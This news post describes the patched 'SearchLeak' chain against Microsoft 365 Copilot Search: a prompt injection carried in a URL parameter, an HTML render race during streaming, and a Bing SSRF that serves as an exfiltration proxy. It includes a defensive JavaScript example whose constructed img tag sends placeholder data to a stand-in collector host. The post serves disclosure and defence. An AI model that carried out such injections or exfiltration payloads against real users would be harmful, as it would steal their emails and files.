
SearchLeak Chain Turns Microsoft 365 Copilot Into Silent Data Theft Tool

bleepingcomputer.com · @threat_watch · 3 hours ago · Cybersecurity · 3 comments

Varonis researchers chained a parameter-to-prompt injection, a race condition, and a Bing SSRF to steal emails, documents, and calendar data via a single URL.

Tags: microsoft 365 copilot · varonis · searchleak · cve 2026 42824 · prompt injection · ssrf

Click one link and Microsoft 365 Copilot Search silently exfiltrates your mailbox, OneDrive, and SharePoint. That is the blunt reality of SearchLeak, a critical vulnerability chain Varonis disclosed and Microsoft fixed as CVE-2026-42824 with a maximum severity rating.

Three Flaws, One Click

Varonis stitched together three individually harmless bugs into a 1-click data theft machine. The first is a parameter-to-prompt injection through the q URL parameter of Copilot Search. Copilot Enterprise Search is built to trawl company data in emails, meetings, SharePoint files, and OneDrive, not to generate content like its consumer sibling. An attacker crafts a URL that injects instructions directly into the search prompt, telling Copilot to extract the titles of emails and embed them in an image URL. The victim types nothing. They click a link, and Copilot executes the attacker's instructions.

The second flaw is an HTML rendering race condition. While Copilot streams its response, raw HTML is briefly rendered by the browser before the content inside code blocks is sanitized. An attacker-controlled <img> tag can fire an outbound request carrying stolen data before the sanitization catches up.
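The render race described above, as an added example that is not code from the article, Varonis or Microsoft: a minimal Node model of a streaming chat renderer that re-renders partial Markdown after every chunk. The racy version treats text as code only once the closing fence has arrived; the hardened version escapes an open fence's body on every intermediate render. Chunk contents and the collector URL are constructed placeholders.

```javascript
// Escape the characters that would otherwise let text become markup.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Racy pattern: only a *complete* fenced block is treated as code. While the
// fence is still open, the text after it is emitted unchanged, so a browser
// given this as innerHTML would parse and act on any tag inside it.
function renderRacy(markdown) {
  return markdown.replace(/```\w*\n([\s\S]*?)```/g,
    (_, body) => `<pre><code>${escapeHtml(body)}</code></pre>`);
}

// Hardened pattern: an open fence is code until it is closed. The body is
// escaped on every intermediate render, so no partial state holds live markup.
function renderSafe(markdown) {
  return markdown.replace(/```\w*\n([\s\S]*?)(?:```|$)/g,
    (_, body) => `<pre><code>${escapeHtml(body)}</code></pre>`);
}

// Replay a stream and inspect every intermediate innerHTML a browser would
// have been handed. Returns true if any state contained a live <img> tag.
function leaksDuringStream(render, chunks) {
  let buffered = '';
  return chunks.some((chunk) => {
    buffered += chunk;
    return /<img\s/i.test(render(buffered));
  });
}

// Checks only the finished response, the way a naive test would.
function leaksWhenComplete(render, chunks) {
  return /<img\s/i.test(render(chunks.join('')));
}

// Constructed stream (not a real capture): the reply wraps an injected tag in a
// code fence, but the closing fence only arrives in the last chunk.
const STREAM = [
  'Here is the result:\n```html\n',
  '<img src="https://collector.example/?d=',
  'SUBJECT-LINE-PLACEHOLDER">\n',
  '```\n',
];

console.log('racy leaks mid-stream:', leaksDuringStream(renderRacy, STREAM));
console.log('safe leaks mid-stream:', leaksDuringStream(renderSafe, STREAM));
console.log('racy leaks when complete:', leaksWhenComplete(renderRacy, STREAM));
```

The last line is the defender's takeaway: a check that only inspects the finished render reports no problem, so tests for this bug class must assert on every intermediate DOM state.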

Bing as Unwitting Proxy

The third piece is a Bing server-side request forgery hiding in the "Search by Image" feature. Because Bing's servers, not the victim's browser, make the request to fetch the image, the browser's Content Security Policy is effectively bypassed. Bing becomes the exfiltration proxy, fetching the attacker's endpoint with stolen data embedded in the URL. From the victim's perspective, Copilot appears to "think" for a moment, with no visible sign of data leaving their tenant.

Varonis researchers nailed the diagnosis: familiar bug classes like SSRF and race conditions become potent weapons when combined with prompt injection in AI contexts. Microsoft has patched the chain, so no user action is needed now. But this attack demonstrates that each new AI surface area creates fresh corridors for old bugs to walk through undetected.

The next vulnerable Copilot integration might not be patched before attackers test it.


Source: New attack turned Microsoft 365 Copilot into 1-click data theft tool
Domain: bleepingcomputer.com
